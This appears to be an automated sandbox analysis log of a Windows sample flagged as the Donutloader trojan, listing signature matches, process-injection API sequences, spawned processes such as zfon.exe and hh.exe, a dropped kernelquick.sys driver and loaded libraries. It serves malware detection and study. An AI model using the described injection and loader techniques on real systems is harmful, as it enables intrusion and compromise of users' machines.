https://nydus.battle.net/Pro/
Source: unknown, HTTPS traffic detected: 3.5.239.146:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: hh.exe, 00000008.00000002.2743230894.000001E47C51F000.00000002.10000000.00040000.00000000.sdmp, Binary or memory string: DirectInput8Create memstr_37605130-b
Source: C:\Windows\hh.exe, Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

System Summary

Source: sslproxydump.pcap, type: PCAP, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 7.2.zfon.exe.7ff79cfb0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Code function: 7_2_00007FF79D0E8AD3 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,7_2_00007FF79D0E8AD3
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Code function: 7_2_0000026ADFD52030 NtQueryInformationProcess,_invalid_parameter_noinfo_noreturn,7_2_0000026ADFD52030
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47AA1F9BC NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,8_2_000001E47AA1F9BC
Source: C:\Windows\explorer.exe, Code function: 12_2_00B93A07 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,12_2_00B93A07
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47C4FC210: CreateFileA,DeviceIoControl,8_2_000001E47C4FC210
Source: C:\Windows\hh.exe, File created: C:\ProgramData\kernelquick.sys
Source: C:\Windows\explorer.exeCode function: 12_2_0AAE7DBC12_2_0AAE7DBC
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF25F012_2_0AAF25F0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFBF06022_2_00007FF79CFBF060
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFB6FC022_2_00007FF79CFB6FC0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFBA92022_2_00007FF79CFBA920
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFB79C022_2_00007FF79CFB79C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFDE5C022_2_00007FF79CFDE5C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFD217022_2_00007FF79CFD2170
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD264E1022_2_00007FFBAD264E10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27460822_2_00007FFBAD274608
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27363C22_2_00007FFBAD27363C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD270E3022_2_00007FFBAD270E30
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD265E8022_2_00007FFBAD265E80
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2844A022_2_00007FFBAD2844A0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28658022_2_00007FFBAD286580
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27057022_2_00007FFBAD270570
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD255FC822_2_00007FFBAD255FC8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28169C22_2_00007FFBAD28169C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD271F1022_2_00007FFBAD271F10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2716F022_2_00007FFBAD2716F0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27672022_2_00007FFBAD276720
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2581D822_2_00007FFBAD2581D8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2640E022_2_00007FFBAD2640E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27895022_2_00007FFBAD278950
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27816C22_2_00007FFBAD27816C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD26341022_2_00007FFBAD263410
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2773E022_2_00007FFBAD2773E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD256C7422_2_00007FFBAD256C74
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2832B822_2_00007FFBAD2832B8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD257AA822_2_00007FFBAD257AA8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD282AE022_2_00007FFBAD282AE0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBB50D7CA022_2_00007FFBB50D7CA0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: String function: 00007FF79D073D20 appears 51 times
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: String function: 00007FF79CFB2520 appears 84 times
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
Source: nrGkqbCyKP.exeStatic PE information: invalid certificate
Source: nrGkqbCyKP.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1993146321.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000000.1468813441.00000000006E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHuya.ExternalTools.Processor.dll* vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exeBinary or memory string: OriginalFilenameHuya.ExternalTools.Processor.dll* vs nrGkqbCyKP.exe
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 7.2.zfon.exe.7ff79cfb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal100.evad.winEXE@13/25@6/5
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B412C0 GetDiskFreeSpaceExW,6_2_00007FFBC1B412C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD55890 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_0000026ADFD55890
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E7A60 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CoCreateInstance,RegQueryValueExW,8_2_000001E47C4E7A60
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57Jump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
Source: C:\Windows\hh.exeMutant created: \Sessions\1\BaseNamedObjects\????
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMutant created: NULL
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMutant created: \Sessions\1\BaseNamedObjects\Blizzard_Scene 0.1_sb
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\edd88b19-8e13-490a-b8ca-43a0d8032f59Jump to behavior
Source: unknownProcess created: C:\Windows\explorer.exe
Source: nrGkqbCyKP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nrGkqbCyKP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: nrGkqbCyKP.exeReversingLabs: Detection: 23%
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: unknownProcess created: C:\Users\user\Desktop\nrGkqbCyKP.exe "C:\Users\user\Desktop\nrGkqbCyKP.exe"
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe"
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exe
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 92
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: unknownProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: sspicli.dllJump to behavior
